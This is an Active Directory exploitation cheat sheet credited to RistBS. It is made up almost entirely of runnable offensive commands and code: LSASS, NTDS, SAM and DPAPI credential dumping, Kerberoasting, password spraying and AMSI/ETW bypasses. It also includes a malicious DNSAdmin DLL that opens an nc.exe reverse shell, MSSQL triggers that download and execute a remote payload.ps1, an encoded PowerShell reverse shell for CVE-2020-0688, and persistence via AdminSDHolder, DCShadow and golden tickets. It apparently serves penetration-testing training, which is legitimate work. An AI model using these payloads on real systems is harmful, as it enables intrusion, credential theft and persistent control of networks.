Summary
AD Exploitation Cheat Sheet by RistBS
Credentials Dumping
Dump Registry Remotely and Directly
Bruteforce AD Password
Custom Username and Password wordlist
Enhanced Security Bypass
AntiMalware Scan Interface
Just Enough Administration
RunAsPPL for Credentials Dumping
MS Exchange
OWA, EWS and EAS Password Spraying
MSSQL Server
DML, DDL and Logon Triggers
Azure Active Directory (AAD)
Miscs
Domain Level Attribute
MachineAccountQuota (MAQ) Exploitation
Abusing IPv6 in AD
IOXIDResolver Interface Enumeration
Tools
Powershell tools :
nishang has multiples useful scripts for windows pentesting in Powershell environement.
powerview is a script from powersploit that allow enumeration of the AD architecture for a potential lateral mouvement.
Enumeration tools :
AD exploitation toolkit :
Dumping Tools :
Listener Tool :
Powershell Components
Powershell Tricks
PS-Session :
Copy #METHOD 1
$c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user
Enter-PSSession -Credential $c -ComputerName 10.10.13.100
# METHOD 2
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('$user, $pass')
Enter-PSSession -Credential $c -ComputerName 10.10.13.100
PSWA Abusing
allow anyone with creds to connect to any machine and any config
[ ! ] this action require credentials.
Copy Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *
Enumeration
Find user with SPN
using PowerView :
using AD Module :
Copy Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Trusts Enumeration
MapTrust :
Domain trusts for the current domain :
using PowerView :
Copy Get-NetDomainTrust #Find potential external trust
Get-NetDomainTrust –Domain $domain
using AD Module :
Copy Get-ADTrust
Get-ADTrust –Identity $domain
Forest Enumeration
Details about the current forest :
Copy Get-NetForest
Get-NetForest –Forest $forest
Get-ADForest
Get-ADForest –Identity $domain
GPO enumeration
List of GPO
Copy Get-NetGPO
Get-NetGPO -ComputerName $computer
Get-GPO -All
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
ACL and ACE enumeration
Enumerate All ACEs
Copy Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID
$_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq
$("$env:UserDomain\$env:Username")) {$_}}
Enumerate users and permissions
Copy Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
Verify if the user already has a SPN :
using PowerView :
Copy Get-DomainUser -Identity supportuser | select serviceprincipalname
using AD Module :
Copy Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
LDAP Enumeration
Copy ldapsearch -x -h 10.10.10.x -p 389 -s base namingcontexts
ldapsearch -h 10.10.10.x -p 389 -x -b "dc=boxname,dc=local"
find service accounts
Copy ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=box,dc=local" | grep "service"
Enumeration with ldapsearch as authenticated user
Copy ldapsearch -x -h ldap.megacorp.corp -w '$pass'
ldapsearch -x -h 10.10.131.164 -p 389 -b "dc=megacorp,dc=corp" -D 'john@megacorp.corp' -w 'vs2k6!'
ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -s base namingcontexts
ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -b 'dc=megacorp'
Enumeration with ldapdomaindump (authenticated) with nice output
Copy ldapdomaindump 10.10.197.117 -u 'megacorp.corp\john' -p '$pass' --no-json --no-grep
Enumeration with nmap scripts
Copy nmap -p 389 --script ldap-search 10.10.10.x
nmap -n -sV --script "ldap*" -p 389 10.10.10.x
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='MEGACORP.CORP',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt 10.10.13.100
SMB Enumeration
enumeration with crackmapexec as unauthenticated
Copy crackmapexec smb 10.10.10.x --pass-pol -u '' -p ''
enumeration with crackmapexec (authenticated)
Copy crackmapexec smb 10.10.11.129 --pass-pol -u usernames.txt -p $pass --continue-on-sucess
crackmapexec smb 10.10.11.129 --pass-pol -u xlsx_users -p $pass --continue-on-sucess
enumeration with kerbrute, against Kerberos pre-auth bruteforcing:
Copy /opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.local --dc 10.10.13.100 -o kerbrute.out users.txt
/opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.htb --dc 10.10.13.100 -o kerbrute.out users.lst --downgrade
by default, kerbrute uses the most secure mode (18 = sha1) to pull some hash. Using the downgrade option we can pull the deprecaded encryption type version (23 = rc4hmac). Or use getNPusers to get some hash instead, it's safer!
provide a password or a list of passwords to test against users
Copy crackmapexec smb 10.10.13.100 --pass-pol -u users.lst -p password_list
Enumerate some users
Copy crackmapexec smb 10.10.13.100 -u users.txt -p $pass --users | tee userlist.txt
Password Spraying on the domain
Copy /opt/kerbrute/dist/kerbrute_linux_amd64 passwordspray -d MEGACORP.CORP --dc 10.10.13.100 users.lst '$pass'
Dump Domain, Groups and Users using Bloodhound-Python:
Copy bloodhound-python -c all -u $user -p $password -d $domain -dc $dc_domain -ns $ip --disable-pooling -w1 --dns-timeout 30
Setting up Bloodhound:
Copy sudo neo4j console
sudo bloodhound
RID Cycling
Global Structure :
Copy S-1-5-21-40646273370-24341400410-2375368561-1036
S-1-5-21
: S refers SID (Security Identifier)
40646273370-24341400410-2375368561
: Domain or Local Computer Identifier
1036
: RID (Relative Identifier)
User SID Structure :
S-1-5-21-40646273370-24341400410-2375368561
: Domain SID
using Crackmapexec :
Copy cme smb $target -u $username -p $password --rid-brute
using lookupsid :
Copy lookupsid.py MEGACORP/$user:'$password'@$target 20000
the value "20000" in lookupsid is to indicate how many RID will be tested
Privilege Escalation
Token Impersonation
The Impersonation token technique allows to impersonate a user by stealing his token, this token allows to exploit this technique because of the SSO processes, Interactive Logon, process running...
using PowerSploit :
list tokens
Copy # Show all tokens
Invoke-TokenManipulation -ShowAll
# show usable tokens
Invoke-TokenManipulation -Enumerate
Start a new process with the token of a user
Copy Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
process token manipulation
Copy Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -ProcessId $id
using Incognito :
load incognito and list tokens :
Copy meterpreter > use incognito
meterpreter > list_tokens -g
impersonate token of "NT AUTHORITY\SYSTEM" :
Copy meterpreter > getuid
Server username: job\john
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Kerberoasting
Enumerate kerberoastable user
Copy Get-DomainUser -SPN | select name,serviceprincipalname
using impacket :
Copy GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
using crackmapexec
Copy crackmapexec ldap $target -u $user -p $password --kerberoasting kerberoastable.txt --kdcHost $kdc
crack the hash :
ASREPRoasting
Enumerate asreproastable user
Copy Get-DomainUser -PreauthNotRequired | select name
Copy GetNPUsers.py -format hashcat -outputfile ASREProastables.txt -dc-ip $kdc '$domain/$user:$password' -request
cracking the hash :
hashcat -m 18200 -a 0 hash wordlist.txt --force
DNSAdmin
Enumerate users in this group :
Copy # METHOD 1
Get-NetGroupMember -GroupName "DNSAdmins"
# METHOD 2
Get-ADGroupMember -Identity DNSAdmins
This attack consists of injecting a malicious arbitrary DLL and restarting the dns.exe service, since the DC serves as a DNS service, we can elevate our privileges to a DA.
DLL File :
Copy #include "stdafx.h"
#include <stdlib.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("c:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.51 5555");
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
you can also create a dll file using msfvenom : msfvenom -p windows/x64/exec cmd='net user administrator aked /domain' - f dll > evil.dll
it'll execute net user administrator aked /domain
with SYSTEM privileges
set the remote DLL path into the Windows Registry
Copy dnscmd dc01 /config /serverlevelplugindll \\10.10.14.33\share\evil.dll
\\10.10.14.33\share\evil.dll
: SMB Share.
restart DNS service
Copy sc.exe stop dns
sc.exe start dns
Lateral Mouvement
WMIExec
uses kerberos auth
Copy impacket-wmiexec -k -no-pass administrator@10.10.10.248
Credentials Dumping
LSASS Dumping
Copy cme <protocol> <ip> -u <user> -p <pass> -M lsassy
Copy procdump --accepteula -ma lsass lsass.dmp
Copy smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local
# use C$
# cd Windows\Temp
# put procdump.exe
Copy psexec.py MEGACORP.LOCAL/john@dc01.megacorp.local "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"
Copy smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local
# get lsass.dmp
parse creds with mimikatz
Copy sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
you can do it locally with mimikatz using : sekurlsa::logonpasswords
.
NTDS Dumping
Abusing DRSUAPI for NTDS dumping
Copy crackmapexec smb 10.10.13.100 -u 'Administrator' -p $password --ntds drsuapi
Abusing VSS for NTDS dumping
using Crackmapexec :
Copy crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds vss
you can do it manually too.
Copy vssadmin create shadow /for=C:
copy $ShadowCopyName\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
vssadmin delete shadows /shadow=$ShadowCopyId
DPAPI Abusing
dump DPAPI BK
Copy dpapi.py backupkeys -t $domain/$user:$password@$target
Decrypt DPAPI MK
Copy # Decrypt DPAPI MK using BK
dpapi.py masterkey -file "/path/to/masterkey" -pvk "/path/to/backup_key.pvk"
# Decrypt DPAPI MK using MK password and user SID
dpapi.py masterkey -file "/path/to/masterkey" -sid $USER_SID -password $mk_password
decrypting protected file using MK
Copy dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
crack DPAPI master key with JTR
Copy python DPAPImk2john.py --sid="$SID" --masterkey="$MASTER_KEY" --context="local"
john dpapimk.dmp --wordlist=/usr/share/wordlists/rockyou.txt --rules=custom.rule
LSA Dumping
you can use mimikatz with this command : lsadump::secrets
SAM Dumping
save SYSTEM hive and SAM in another directory
Copy reg save HKLM\SAM c:\path\to\SAM
reg save HKLM\SYSTEM c:\path\to\SYSTEM
Copy lsadump::sam /system:c:\path\to\SYSTEM /sam:c:c:\path\to\SAM
or just use : lsadump::sam
[ 📝 ] Notes : you can dump SAM and LSA with crackmapexec or secretdump using these commands :
Copy secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
Copy crackmapexec smb $ip -d $domain -u $user -p $password --sam/--lsa
Dump Registry Remotely and Directly
[ ❓ ] What is Registry ? : the Registry is divided into several sections called hives . A registry hive is a top level registry key predefined by the Windows system to store registry keys for specific objectives. Each registry hives has specific objectives, there are 6 registry hives, HKCU, HKLM, HKCR, HKU, HKCC and HKPD the most enteresting registry hives in pentesting is HKU and HKLM.
HKEY_LOCAL_MACHINE called HKLM includes three keys SAM, SYSTEM, and SECURITY.
dump SYSTEM and SECURITY remotely from HKLM :
Copy secretsdump.py local -system SYSTEM -security SECURITY -ntds ntds.dit -outputfile hashes
dump HKU registry remotely with hashes argument :
Copy impacket-reg -hashes :34ed87d42adaa3ca4f5db34a876cb3ab domain.local/john.doe@job query -keyName HKU\\Software
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
Read GMSA Password
Copy $user = 'USER'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
gMSA dumping:
Copy python3 gMSADumper.py -u $user -p $password -d $domain.local
Hash Cracking
LM :
Copy # using JTR :
john --format=lm hash.txt
# using hashcat :
hashcat -m 3000 -a 3 hash.txt
NT :
Copy # using JTR :
john --format=nt hash.txt --wordlist=wordlist.txt
# using hashcat :
hashcat -m 1000 -a 3 hash.txt
NTLMv1 :
Copy # using JTR :
john --format=netntlmv1 hash.txt
# using hashcat :
hashcat -m 5500 --force -a 0 hash.txt wordlist.txt
NTLMv2 :
Copy # using JTR :
john --format=netntlmv2 hash.txt
# using hashcat :
hashcat -m 5600 --force -a 0 hash.txt wordlist.txt
note : some Hash Type in hashcat depend of the etype
Bruteforce AD Password
Custom Username and Password wordlist
default password list (pwd_list) : Autumn Spring Winter Summer
create passwords using bash & hashcat :
Copy for i in $(cat pwd_list); do echo $i, echo ${i}\!; echo ${i}2019; echo ${i}2020 ;done > pwds
haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule
haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toogles1.r | sort u
haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toogles1.r | sort u | awk 'length($0) > 7' > pwlist.txt
default username list (users.list) :
Copy john doe
paul smith
jacaques miller
create custom usernames using username-anarchy :
Copy ./username-anarchy --input-file users.list --select-format first,first.last,f.last,flast > users2.list
Pivoting
Pivot with WDFW via custom rules
Copy netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCALPORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp
allow connections to localport
Copy netsh advfirewall firewall add rule name="pivot like a pro" protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow
SMB Pipes
Local/Remote ports can be forwarded using SMB pipes . You can use Invoke-Piper or Invoke-SocksProxy for that.
Invoke-Piper
: used to forward local or remote ports
Invoke-SocksProxy
: used for dynamic port forwarding
Case 1 Local port forwarding through pipe forPivot: -L 33389:127.0.0.1:3389
SERVER SIDE :
Copy Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3389
CLIENT SIDE :
Copy Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 33389
Case 2 Admin only remote port forwarding through pipe forPivot: -R 33389:127.0.0.1:3389
SERVER SIDE :
Copy Invoke-PiperServer -remote -bindPipe forPivot -bindPort 33389 -security Administrators
CLIENT SIDE :
Copy Invoke-PiperClient -remote -destPipe forPivot -pipeHost $server_ip -destHost 127.0.0.1 -destPort 3389
Case 3 Dynamic port forwarding with Invoke-SocksProxy with forPivot as NamedPipe: -D 3333
SERVER SIDE :
Copy Invoke-SocksProxy -bindPort 3333
Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3333
CLIENT SIDE :
Copy Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 3333
SharpSocks
SharpSocks is mostly used in C2 Frameworks and work with C2 Implants
build a server:
Copy PS> .\SharpSocksServer.exe --cmd-id=$id --http-server-uri=$uri --encryption-key=$key -v
RDP Tunneling via DVC
sharings drives:
Copy PS > regsvr32 UDVC-Plugin.dll
PS > subst.exe x: C:\Users\john\RDP_Tools
map the drives:
Copy PS > net use x: \\TSCLIENT\X
create a server with SSFD.exe
Redirect SSF port with DVC server:
Copy PS > ./UDVC-Server.exe -c -p 8080 -i 127.0.0.1
[*] Setting up client socket
[*] Connected to: 127.0.0.1:8080
[*] Starting thread RsWc
[*] Starting thread RcWs
[*] Wait for threads to exit...
SSFD as a SOCK proxy
Copy PS > ssf.exe -D 9090 -p 31337 127.0.0.1
Persistence
SIDHistory Injection
AdminSDHolder and SDProp
[ ❓ ] : With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.
using PowerView :
Copy Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights All -Verbose
using AD Module :
Copy Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=megacorp,DC=megacorp,DC=local' -Principal $user -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights WriteMembers -Verbose
Run SDProp manually
Copy Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
ACLs and ACEs Abusing
GenericAll
list all groups to which the user belongs and has explicit access rights
Copy Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID
$_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Copy net group Administrator aker /add /domain
Enhanced Security Bypass
AntiMalware Scan Interface
Copy sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
patching AMSI from Powershell6 :
Copy [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)
ConstrainLanguageMode
Bypass CLM using runspace :
Copy static void Main(string[] args){
Runspace run = RunspaceFactory.CreateRunspace();
run.Open();
PowerShell shell = PowerShell.Create();
shell.Runspace = run;
String cmd = "iex(new-object net.webclient).DownloadString('http://10.10.14.33/script')";
shell.AddScript(cmd);
shell.Invoke();
run.Close();
}
Just Enough Administration
show current languages level :
Copy # METHOD 1
(Get-PSSessionConfiguration -Name Test).LanguageMode
# METHOD 2
$ExecutionContext.SessionState.LanguageMode # use property
Bypass JEA in ConstrainedLanguage :
Copy { C:\Windows\System32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.33 9003 }
ExecutionPolicy
Copy powershell -ExecutionPolicy Bypass -File C:\script.ps1
bypass EP using encoding :
Copy $command = "Write-Host 'hello world'"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($command);$encoded = [Convert]::ToBase64String($bytes); powershell.exe -EncodedCommand $encoded
RunAsPPL for Credentials Dumping
[ ❓ ] : RunAsPPL is an additional LSA protection to prevent reading memory and code injection by non-protected processes .
bypass RunAsPPL with mimikatz :
Copy mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
ETW Disabling
Copy [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
you can try obfuscation techniques on this command. To learn more about ETW see my course here
MS Exchange
OWA EWS and EAS Password Spraying
using MailSniper :
Copy # OWA (Outlook web App)
Invoke-PasswordSprayOWA -ExchHostname $domain -UserList .\users.txt -Password $password
# EAS (Exchange ActivSync)
Invoke-PasswordSprayEAS -ExchHostname $domain -UserList .\users.txt -Password $password
# EWS (Exchange Web Service)
Invoke-PasswordSprayEWS -ExchHostname $domain -UserList .\users.txt -Password $password
using ruler :
Copy ./ruler -domain $domain --insecure brute --userpass $userpass.txt -v
GAL and OAB Extraction
GAL (Global Address Book) Extraction
Copy ./ruler -k -d $domain -u $user -p $password -e user@example.com --verbose abk dump -o email_list.txt
using powershell :
Copy PS C:\> Get-GlobalAddressList -ExchHostname mx.megacorp.com -UserName $domain\$user -Password $password -OutFile email_list.txt
OAB (Offline Address Book) Extraction
extract OAB.XML file which contains records
Copy curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/oab.xml > oab.xml
cat oab.xml |grep '.lzx' |grep data
extract LZX compressed file
Copy curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/$OABId-data-1.lzx > oab.lzx
./oabextract oab.lzx oab.bin && strings oab.bin |egrep -o "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])" | sort -u > emails.txt
using oaburl.py :
Copy ./oaburl.py $domain/$user:$password@domain.com -e valid@domain.com
PrivExchange
PrivExchange use PushSubscription Feature, a user is able to capture the NTLM authentication data of an Exchange server With a simple call to the "PushSubscription" API
Copy responder -I eth0 -Av
python3 privexchange.py -d $domain -u $user -p $password -ah -ap '/test/test/test' mx.server.com --debug
ProxyLogon
ProxyLogon is the name given to CVE-2021-26855 that allows an attacker to bypass authentication and impersonate users on MS Exchange servers
Copy python proxylogon.py $ip user@fqdn
using metasploit:
Copy use auxiliary/scanner/http/exchange_proxylogon
use auxiliary/gather/exchange_proxylogon
use exploit/windows/http/exchange_proxylogon_rce
CVE-2020-0688
this CVE allow RCE on EWS through fixed cryptographic keys
Get Values for RCE :
ViewStateUserKey : document.getElementById("_VIEWSTATEGENERATOR").value
ViewStateGenerator : ASP.NET_SessionId
Copy ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc JHNtPShOZXctT2JqZWN0IE5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTAuMTAuMTQuOSIsOTAwNikpLkdldFN0cmVhbSgpO1tieXRlW11dJGJ0PTAuLjY1NTM1fCV7MH07d2hpbGUoKCRpPSRzbS5SZWFkKCRidCwwLCRidC5MZW5ndGgpKSAtbmUgMCl7OyRkPShOZXctT2JqZWN0IFRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRidCwwLCRpKTskc3Q9KFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKChpZXggJGQgMj4mMSkpOyRzbS5Xcml0ZSgkc3QsMCwkc3QuTGVuZ3RoKX0=" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
MSSQL Server
UNC Path Injection
[ ❓ ] : Uniform Naming Convention allows the sharing of resources on a network via a very precise syntax: \IP-Server\shareName\Folder\File
launch responder : responder -I eth0
Copy EXEC master..xp_dirtree \"\\\\192.168.1.33\\\\evil\";
Copy 1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
MC-SQLR Poisoning
The SQL Server Resolution Protocol is a simple application-level protocol that is used for the transfer of requests and responses between clients and database server discovery services.
Copy CreateObject("ADODB.Connection").Open "Provider=SQLNCLI11;Data Source=DOESNOTEXIST\INSTANCE;Integrated Security=SSPI;"
we captured the hash of the Administrator with this VBA script.
Copy [+] Listening for events...
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[MSSQL-BROWSER] Sending poisoned browser response to 10.10.14.33
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[MSSQL] NTLMv2 Client : 10.1.2.3
[MSSQL] NTLMv2 Username : TEST\Administrator
[MSSQL] NTLMv2 Hash : Administrator::TEST:1122334455667788...
DML, DDL and Logon Triggers
[ ❓ ] : Triggers are a stored procedure that automatically executes when an event occurs in the SQL Server.
Data Definition Language (DDL) – Executes on Create, Alter and Drop statements and some system stored procedures.
Data Manipulation Language (DML) – Executes on Insert, Update and Delete statements.
Logon Triggers – Executes on a user logon.
Triggers Listing
list All triggers
Copy SELECT * FROM sys.server_triggers
list triggers for a database
Copy SELECT * FROM sys.server_triggers
list DDL and DML triggers on an instance using powershell
Copy Get-SQLTriggerDdl -Instance ops-sqlsrvone -username $username -Password $password -Verbose
Get-SQLTriggerDml -Instance ops-sqlsrvone -username $username -Password $password -Verbose
use DML triggers for persistence
Copy USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
USE testdb
CREATE TRIGGER [persistence_dml_1]
ON testdb.dbo.datatable
FOR INSERT, UPDATE, DELETE AS
EXECUTE AS LOGIN = 'as'
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')"'
GO
use DDL triggers for persistence
Copy CREATE Trigger [persistence_ddl_1]
ON ALL Server
FOR DDL_LOGIN_EVENTS
AS
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')"
GO
use Logon triggers for persistence
Copy CREATE Trigger [persistence_logon_1]
ON ALL SERVER WITH EXECUTE AS 'sa'
FOR LOGON
AS
BEGIN
IF ORIGINAL_LOGIN() = 'testuser'
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')"
END;
Forest Persistence
DCShadow
DCShadow temporarily registers a new domain controller in the target domain and uses it to "push" attributes like SIDHistory, SPNs... on specified objects without leaving the change logs for modified object!
⚠️ Requirements :
DA privileges are required to use DCShadow.
The attacker's machine must be part of the root domain.
The attack needs 2 instances on a compromised machine :
1 instance : start RPC servers with SYSTEM privileges and specify attributes to be modified
Copy mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"
2 instance : with enough privileges of DA to push the values :
Copy mimikatz # sekurlsa::pth /user:Administrator /domain:$domain /ntlm:$admin_hash /impersonate
mimikatz # lsadump::dcshadow /push
Cross Forest Attacks
Trust Tickets
Dumping Trust Key
Copy Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Forging IR-TGT using Trust key
Copy Invoke-Mimikatz -Command '"Kerberos::golden /domain:$domain /sid:$sid /sids:$extra_sids /rc4:$rc4_hash /user:Administrator /service:krbtgt /target:$target /ticket:$path/to/trust_ticket.kirbi"'
get TGS for CIFS service
Copy asktgs path/to/trust_ticket.kirbi CIFS/ps-dc.powershell.local
use TGS for CIFS service
Copy kirbikator.exe lsa .\CIFS.$domain.kirbi ls \\$domain\`c$
Using KRBTGT hash
Copy Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domaine.fun.local /sid:S-1-5-x-x-x-x /sids:S-1-5-x-x-x-x-519 /krbtgt:<hash> /ticket:C:\path\krb_tgt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\krb_tgt.kirbi
Azure Active Directory
AZ User Enumeration
connection to Azure Active Directory with Connect-MsolService .
Copy PS> Connect-MsolService -Credential $cred
this command allow enumeration with MFA (MultiFactor Authentification)
Copy Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_. StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
locate Azure AD Connect Server
Copy ldapsearch -H ldap://DC01.MEGACORP.CORP:389 -D "MEGACORP\john" -w $password -b "DC=MEGACORP,DC=CORP" '(description=*Azure*)' description
Enumeration using AZ CLI
Storage Enumeration
blob storage enumeration
Copy az storage account list -o table
az storage account list -o json | jq -r '.[].name'
PowerZure
create a new user
Copy New-AzureUser -Username 'john.doe@megacorp.com' -Password catAker
Executes a command on a specified VM
Copy Execute-Command -OS Windows -VM Win10 -ResourceGroup rg01 -Command "whoami"
Golden SAML
⚠️ Requirements :
Admin privileges of ADFS server
Obtain ADFS Public Certificate
:
Copy PS > [System.Convert]::ToBase64String($cer.rawdata)
Obtain IdP Name
:
Copy PS > (Get-ADFSProperties).Identifier.AbsoluteUri
Obtain Role Name
:
Copy PS > (Get-ADFSRelyingPartyTrust).IssuanceTransformRule
a toolkit to exploit Golden SAML can be found here
** Golden SAML is similar to golden ticket and affects the Kerberos protocol. Like the Golden Ticket, the Golden SAML allows an attacker to access resources protected by SAML agents (examples: Azure, AWS, vSphere, Okta, Salesforce, ...) with elevated privileges through a golden ticket.**
ShockNAwe:
Remotely extracts the AD FS configuration settings
Forges and signs a Golden SAML token
Extracts the ‘assertion’ portion of the Golden SAML token and passes it to the Azure Core Management API to obtain a valid access token for the API
Enumerates the Subscription ID
Enumerates the complete list of VMs in the subscription
Executes arbitrary commands on all VMs as SYSTEM/root
